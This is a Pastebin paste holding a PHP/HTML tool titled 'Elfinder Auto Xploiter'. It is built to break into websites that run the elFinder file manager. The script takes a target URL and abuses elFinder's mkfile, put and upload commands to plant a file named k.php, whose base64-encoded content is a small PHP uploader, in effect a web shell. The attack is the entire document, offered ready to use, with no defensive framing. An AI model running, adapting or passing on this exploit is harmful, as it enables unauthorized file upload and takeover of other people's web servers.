AgusSR

Elfinder Auto Xploiter [ Single Xploiter ]

Feb 15th, 2016
3,689
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <html>
  2. <form method="post">
  3. Target: <input type="text" name="target" size="35" height="10" placeholder="http://www.target.com/">
  4. <input type="submit" name="x" value="hajar">
  5. </form>
  6. </html>
  7. <?php
  8. function ngirim($url, $isi) {
  9. $ch = curl_init ("$url");
  10.       curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  11.       curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
  12.       curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  13.       curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
  14.       curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
  15.       curl_setopt ($ch, CURLOPT_POST, 1);
  16.       curl_setopt ($ch, CURLOPT_POSTFIELDS, $isi);
  17.       curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
  18.       curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
  19. $data3 = curl_exec ($ch);
  20. return $data3;
  21. }
  22. $target = $_POST['target'];
  23. if($_POST['x']) {
  24.     $nama_doang = "k.php";
  25.     $isi_nama_doang = "PD9waHAgCmlmKCRfUE9TVCl7CmlmKEBjb3B5KCRfRklMRVNbImYiXVsidG1wX25hbWUiXSwkX0ZJTEVTWyJmIl1bIm5hbWUiXSkpewplY2hvIjxiPmJlcmhhc2lsPC9iPi0tPiIuJF9GSUxFU1siZiJdWyJuYW1lIl07Cn1lbHNlewplY2hvIjxiPmdhZ2FsIjsKfQp9CmVsc2V7CgllY2hvICI8Zm9ybSBtZXRob2Q9cG9zdCBlbmN0eXBlPW11bHRpcGFydC9mb3JtLWRhdGE+PGlucHV0IHR5cGU9ZmlsZSBuYW1lPWY+PGlucHV0IG5hbWU9diB0eXBlPXN1Ym1pdCBpZD12IHZhbHVlPXVwPjxicj4iOwp9Cgo/Pg==";
  26.     $decode_isi = base64_decode($isi_nama_doang);
  27.     $encode = base64_encode($nama_doang);
  28.     $fp = fopen($nama_doang,"w");
  29.     fputs($fp, $decode_isi);
  30.     echo "[+] $target <br>";
  31.     echo "[+] Upload[1] ......<br>";
  32.     $url_mkfile = "$target?cmd=mkfile&name=$nama_doang&target=l1_Lw";
  33.     $b = file_get_contents("$url_mkfile");
  34.     $post1 = array(
  35.             "cmd" => "put",
  36.             "target" => "l1_$encode",
  37.             "content" => "$decode_isi",
  38.             );
  39.     $post2 = array(
  40.             "current" => "8ea8853cb93f2f9781e0bf6e857015ea",
  41.             "upload[]" => "@$nama_doang",);
  42.     $output_mkfile = ngirim("$target", $post1);
  43.     if(preg_match("/$nama_doang/", $output_mkfile)) {
  44.         echo "# Upload Success 1... => $nama_doang<br># Coba buka di ../../elfinder/files/...<br>";
  45.     } else {
  46.         echo "# Upload Failed 1 <br># Uploading 2..<br>";
  47.         $upload_ah = ngirim("$target?cmd=upload", $post2);
  48.         if(preg_match("/$nama_doang/", $upload_ah)) {
  49.             echo "# Upload Success 2 => $nama_doang<br># Coba buka di ../../elfinder/files/...<br>";
  50.         } else {
  51.             echo "# Upload Failed 2<br><br>";
  52.         }
  53.     }
  54. }
  55. ?>
RAW Paste Data